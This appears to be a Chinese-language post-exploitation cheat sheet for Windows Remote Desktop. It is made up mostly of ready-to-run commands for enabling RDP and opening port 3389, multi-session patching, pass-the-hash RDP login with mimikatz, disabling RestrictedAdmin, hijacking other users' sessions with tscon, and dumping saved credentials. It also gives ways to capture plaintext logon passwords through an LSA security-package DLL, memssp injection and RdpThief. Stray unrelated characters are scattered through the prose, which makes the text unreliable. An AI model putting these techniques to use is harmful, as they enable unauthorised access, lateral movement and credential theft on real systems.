查看是否開啟遠(yuǎn)程桌面

0x1表示關(guān)閉伐谈；0x0表示開啟

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

image.png

查看遠(yuǎn)程桌面的端口號

得到的結(jié)果為16進(jìn)制格式

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

image.png

開啟/關(guān)閉遠(yuǎn)程桌面

• 開啟

meterpreter > run post/windows/manage/enable_rdp 

image.png

• 關(guān)閉

meterpreter > run multi_console_command -r /root/.msf4/loot/20191203031341_default_192.168.80.132_host.windows.cle_476697.txt

image.png

修改防火墻允許3389端口通過

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

image.png

開啟多用戶登錄

1.mimikatz支持安裝補(bǔ)丁實現(xiàn)多用戶登錄驾讲，但是重啟后會失效

• 使用與原系統(tǒng)相同的賬戶，原系統(tǒng)還是會被切換到登錄界面
• 使用與原系統(tǒng)不同的賬戶燕侠，可成功登錄

privilege::debug
ts::multirdp

image.png

2.安裝rdpwrap實現(xiàn)多用戶登錄
地址：https://github.com/stascorp/rdpwrap

install.bat 安裝
uninstall.bat 卸載

image.png

使用hash登錄windows遠(yuǎn)程桌面

適用于Windows 10和Server 2012系統(tǒng)畏腕；Windows 7和Server 2008默認(rèn)不支持乘凸，需要安裝2871997鸥拧、2973351補(bǔ)丁党远。

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.80.246 /ntlm:32ed87bdb5fdc5e9cba88547376818d4 "/run:mstsc.exe /restrictedadmin"

image.png

如果登錄時有如下提示，可通過修改注冊表解決

image.png

beacon> shell REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

利用tscon登錄任意用戶的遠(yuǎn)程桌面

• 比如我們獲得了一臺administrator權(quán)限的服務(wù)器

image.png

• 首先使用psexec獲得system權(quán)限

psexec64.exe -i -s cmd.exe

image.png

• 接下來查看當(dāng)前有哪些用戶在線

query user

image.png

• 最后切換到會話2的遠(yuǎn)程桌面

tscon 2

image.png

獲取遠(yuǎn)程桌面的歷史記錄以及保存的賬號密碼

meterpreter > run post/windows/gather/enum_termserv 

image.png

https://www.nirsoft.net/utils/network_password_recovery.html

image.png

ssp密碼記錄

記錄rdp登入到當(dāng)前系統(tǒng)時富弦，輸入的明文賬號密碼沟娱。

方法一：需要重啟才能生效

自定義一個dll，例如mimikatz中的mimilib.dll腕柜，在系統(tǒng)啟動時济似，加載到lsass.exe進(jìn)程中

• 首先將mimilib.dll復(fù)制到c:\windows\system32目錄下

copy mimilib.dll c:\windows\system32

• 然后添加mimilib.dll到注冊表

reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\ /v "Security Packages"

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\ /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

• 有人登錄時，密碼會保存在C:\Windows\System32\kiwissp.log

image.png

方法二：利用mimikatz進(jìn)程注入媳握，無需重啟即可生效碱屁，但重啟后會失效

mimikatz privilege::debug
mimikatz misc::memssp
type C:\Windows\System32\mimilsa.log 

RdpThief

記錄在當(dāng)前系統(tǒng)rdp登出時，輸入的明文賬號密碼蛾找。
https://github.com/0x09AL/RdpThief.git

beacon> rdpthief_enable
beacon> rdpthief_dump
beacon> rdpthief_disable

image.png

參考：

https://laucyun.com/17f97e47b62717fb9b36750723aa861d.html
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Pass-the-Hash-with-Remote-Desktop/
https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8E%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%8F%90%E5%8F%96%E6%98%8E%E6%96%87%E5%87%AD%E6%8D%AE/
https://www.cnblogs.com/zpchcbd/p/11865633.html